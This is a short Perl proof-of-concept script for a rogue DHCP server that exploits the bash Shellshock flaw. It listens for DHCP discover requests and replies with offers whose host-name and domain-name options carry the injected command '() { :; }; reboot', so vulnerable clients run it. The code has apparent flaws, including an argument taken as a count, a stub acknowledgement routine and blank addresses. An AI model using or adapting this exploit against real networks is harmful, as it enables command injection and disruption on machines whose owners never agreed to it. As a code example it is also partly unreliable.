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- #!/usr/bin/perl
- # largely purloined from as my PoC for the old options overflow proved too messy^wPerlish to rework - [machine]
- use strict;
- use IO::Socket;
- use Net::DHCP::Packet;
- use Net::DHCP::Constants;
- my $server_ip = "";
- my $client_ip = "";
- my $subnet_mask = "";
- my $socket_in = IO::Socket::INET->new( LocalPort => 67, LocalAddr => "", Proto => 'udp') or die $@;
- while(1) {
- my $buf;
- $socket_in->recv($buf,4096);
- my $packet = new Net::DHCP::Packet($buf);
- my $messagetype = $packet->getOptionValue(DHO_DHCP_MESSAGE_TYPE());
- if ($messagetype eq DHCPDISCOVER()) {
- send_offer($packet);
- } elsif ($messagetype eq DHCPREQUEST()) {
- send_ack($packet);
- }
- }
- sub send_offer {
- my $request = @_;
- my $socket_out = IO::Socket::INET->new( PeerPort => 68, PeerAddr => "", LocalAddr => "$server_ip:67", Broadcast => 1, Proto => 'udp') or die $@;
- my $offer = new Net::DHCP::Packet(Op => BOOTREPLY(), Xid => $request->xid(), Flags => $request->flags(), Ciaddr => $request->ciaddr(), Yiaddr => $client_ip, Siaddr => $server_ip, Giaddr => $request->giaddr(), Chaddr => $request->chaddr(), DHO_DHCP_MESSAGE_TYPE() => DHCPOFFER());
- $offer->addOptionValue(DHO_SUBNET_MASK(), $subnet_mask);
- $offer->addOptionValue(DHO_NAME_SERVERS, $server_ip);
- $offer->addOptionValue(DHO_HOST_NAME, "() { :; }; reboot");
- $offer->addOptionValue(DHO_DOMAIN_NAME, "() { :; }; reboot");
- $socket_out->send($offer->serialize()) or die $!;
- print STDERR "sent offer\n";
- }
- sub send_ack {
- print STDERR "send ack\n";
- }
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